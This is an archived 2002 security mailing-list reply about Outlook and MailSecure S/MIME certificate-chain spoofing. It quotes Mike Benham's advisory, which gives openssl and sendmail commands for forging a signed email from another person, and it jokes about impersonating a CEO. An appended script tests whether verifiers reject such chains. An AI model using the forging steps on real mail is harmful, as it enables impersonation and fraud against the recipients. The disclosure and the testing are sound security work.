Re: Outlook S/MIME Vulnerability

From: Spyder (spyderat_private)
Date: Tue Sep 03 2002 - 07:36:56 PDT


    There's more to it than just Outlook.
    
    Baltimore's MailSecure, an Outlook plugin which (among other things)
    verifies S/MIME certs, is also vulnerable to this problem.
    Certificates issued by "middle men" appear in MailSecure's certificate
    information as having "inherited trust".
    However, MailSecure usually displays "new certificate" information
    containing the CN of the certificate's owner. In this case, 2 new
    certificates show up (the spoofed person's name, and the middle man's
    name), and the end user may find it odd to see 2 names in there (unless
    the middle man is someone the "victim" already knew, and the name won't
    show up because it isn't new).
    
    Severity: 
    - There are reasonable means of being "caught" if you're dealing with
    people who don't know you (or trust you), because your name will show up
    in there (assuming you're using your own cert as the issuer)
    - In closed (corporate) environments, it may get more serious. You can
    e-mail a colleague as if you were the CEO, and "fire" him ;-)
    
    Exploit:
    - The same technique explained by Mike Benham for Outlook works here.
    
    Vendor Notification:
    - Local representative notified today.
    
    On Mon, 2002-09-02 at 18:37, Mike Benham wrote:
    > 
    > =======================================================================
    > Outlook S/MIME Vulnerability 09/02/02
    > Mike Benham <moxieat_private>
    > http://www.thoughtcrime.org
    > 
    > =======================================================================
    > Abstract
    > 
    > Outlook's S/MIME implementation is vulnerable to the certificate chain
    > spoofing attack, despite Microsoft's claim that IE is the only affected
    > application.  The vulnerability allows anyone to forge the digital
    > signature on an email that is to be viewed with Outlook.  No warnings are
    > given, no dialogs are shown.
    > 
    > ========================================================================
    > Description
    > 
    > For a complete description of the certificate chain attack, see:
    > http://online.securityfocus.com/archive/1/286290
    > 
    > As with the IE SSL vulnerability, an attacker generates a bad certificate
    > chain:
    > 
    > [Issuer:VeriSign | Subject:VeriSign]
    > >[Issuer:VeriSign | Subject:www.thoughtcrime.org]
    >  >[Issuer:www.thoughtcrime.org | Subject:Bill Gates/billgatesat_private]
    > 
    > Outlook fails to check the Basic Constraints on the intermediate
    > certificate and accepts the leaf certificate as valid.
    > 
    > =========================================================================
    > Severity
    > 
    > As it stands, there is virtually no difference between signed and unsigned
    > email in Outlook.  Unless carefully inspected, signed email in Outlook is
    > essentially meaningless.  This also applies to any signed email received
    > over the past 5+ years.
    > 
    > Prudent users who must continue using Outlook for signed email should
    > manually inspect and verify received certificate chains.
    > 
    > ========================================================================
    > Affected Clients
    > 
    > Mozilla is NOT vulnerable.
    > 
    > Outlook Express 5 is vulnerable.
    > (Tested on fully patched Win2k SP3 system)
    > 
    > ========================================================================
    > Exploit
    > 
    > 1) Put a valid CA-signed certificate and private key in a file
    > "middle.pem"
    > 
    > (If you don't have a valid CA-signed certificate, there's one bundled with
    > sslsniff: http://www.thoughtcrime.org/ie.html)
    > 
    > 2) Generate a fake leaf certificate signing request:
    > 
    >   a) openssl genrsa -out key.pem 1024
    >   b) openssl req -new -key key.pem -out leaf.csr
    > 
    > 3) Sign the CSR with your "intermediate" certificate:
    > 
    >   a) openssl x509 -req -in leaf.csr -CA middle.pem -CAkey middle.pem
    > -CAcreateserial -out leaf.pem
    > 
    > 4) Sign a spoofed mail message:
    > 
    >   a) openssl smime -sign -in mail.txt -text -out mail.msg -signer leaf.pem
    > -inkey key.pem -certfile middle.pem -from billgatesat_private -to
    > whomeverat_private -subject "SM Exploit"
    > 
    > 5) Send the mail:
    > 
    >   a) cat mail.msg | sendmail whomeverat_private
    > 
    > I encourage everyone to send Bill Gates an email from himself.  =)
    > 
    > ==========================================================================
    > Vendor Notification Status
    > 
    > Microsoft knows about this, of course, but "isn't even sure whether to
    > call this a 'vulnerability'."  Right.
    > 
    > - Mike
    > 
    > --
    > http://www.thoughtcrime.org
    -- 
    Spyder <spyderat_private>
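The check Benham recommends ("manually inspect and verify received certificate chains") can be automated for the chain shape his advisory describes. The script below is an added demonstration and is not part of either post above: it builds the same three-level chain inside a throwaway PKI (a local root standing in for the public CA, a legitimately issued end-entity cert standing in for the "middle man", and a leaf signed by that end-entity cert) and then asks a verifier that enforces Basic Constraints whether it accepts the leaf, both as a bare chain and as an S/MIME signature. The config file `demo.cnf`, the `DEMO_DIR` variable, the function names, the `*.example.test` names and the constructed message body are all assumptions of this example; the only real identifiers are the standard `openssl` subcommands and options.

```shell
#!/bin/sh
# Added demonstration (not part of the original advisory or reply): reproduce the
# advisory's chain shape in a throwaway PKI and confirm that a verifier which
# honours Basic Constraints rejects the leaf. Everything here is constructed.
set -e

DEMO_DIR="${DEMO_DIR:-$(mktemp -d)}"   # assumed scratch directory

# Minimal OpenSSL config with two extension profiles: a real CA and an end-entity cert.
write_config() {
  cat > "$DEMO_DIR/demo.cnf" <<'EOF'
[req]
distinguished_name = dn
prompt = no
[dn]
CN = overridden-by-subj
[v3_ca]
basicConstraints = critical, CA:TRUE
keyUsage = critical, keyCertSign, cRLSign
[v3_ee]
basicConstraints = critical, CA:FALSE
keyUsage = critical, digitalSignature
EOF
}

# Build: root CA -> "middle" end-entity cert (CA:FALSE) -> leaf signed by middle.
build_chain() {
  cd "$DEMO_DIR"
  write_config
  # Throwaway root; stands in for the public CA at the top of the advisory's chain.
  openssl req -x509 -newkey rsa:2048 -nodes -keyout root.key -out root.pem -days 30 \
    -subj "/CN=Demo Root CA" -config demo.cnf -extensions v3_ca >/dev/null 2>&1
  # Legitimately issued end-entity cert: explicitly NOT a CA.
  openssl req -new -newkey rsa:2048 -nodes -keyout middle.key -out middle.csr \
    -subj "/CN=middle.example.test" -config demo.cnf >/dev/null 2>&1
  openssl x509 -req -in middle.csr -CA root.pem -CAkey root.key -CAcreateserial \
    -out middle.pem -days 30 -extfile demo.cnf -extensions v3_ee >/dev/null 2>&1
  # Leaf signed by the end-entity cert, the shape the advisory describes.
  openssl req -new -newkey rsa:2048 -nodes -keyout leaf.key -out leaf.csr \
    -subj "/CN=Spoofed Sender/emailAddress=spoofed@example.test" -config demo.cnf >/dev/null 2>&1
  openssl x509 -req -in leaf.csr -CA middle.pem -CAkey middle.key -CAcreateserial \
    -out leaf.pem -days 30 -extfile demo.cnf -extensions v3_ee >/dev/null 2>&1
}

# Control: the legitimately issued "middle" cert itself verifies fine against the root.
check_middle() {
  if openssl verify -CAfile "$DEMO_DIR/root.pem" "$DEMO_DIR/middle.pem" >/dev/null 2>&1; then
    echo accepted
  else
    echo rejected
  fi
}

# Prints "rejected" when path validation refuses the leaf, "accepted" otherwise.
# A conforming verifier fails here because middle.pem carries CA:FALSE.
check_chain() {
  if openssl verify -CAfile "$DEMO_DIR/root.pem" -untrusted "$DEMO_DIR/middle.pem" \
       "$DEMO_DIR/leaf.pem" >/dev/null 2>&1; then
    echo accepted
  else
    echo rejected
  fi
}

# Same question asked of the S/MIME layer: sign a constructed message with the leaf,
# ship the "middle" cert alongside it as the advisory does, and verify against the root.
check_smime() {
  cd "$DEMO_DIR"
  printf 'Subject: demo\n\nconstructed message body\n' > mail.txt
  openssl smime -sign -in mail.txt -out mail.msg -signer leaf.pem -inkey leaf.key \
    -certfile middle.pem >/dev/null 2>&1
  if openssl smime -verify -in mail.msg -CAfile root.pem -out /dev/null >/dev/null 2>&1; then
    echo accepted
  else
    echo rejected
  fi
}

build_chain
echo "middle cert alone: $(check_middle)"   # accepted
echo "bare chain:        $(check_chain)"    # rejected
echo "S/MIME message:    $(check_smime)"    # rejected
```

The two "rejected" lines are the behaviour Outlook lacked in 2002: the end-entity certificate in the middle has no authority to issue, so a correct verifier stops the path there regardless of how valid the rest of the chain looks. Running the same three checks against the S/MIME verifier of any client under evaluation is a quick way to confirm it enforces Basic Constraints before relying on its signature indicator.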
    



    This archive was generated by hypermail 2b30 : Tue Sep 03 2002 - 09:20:20 PDT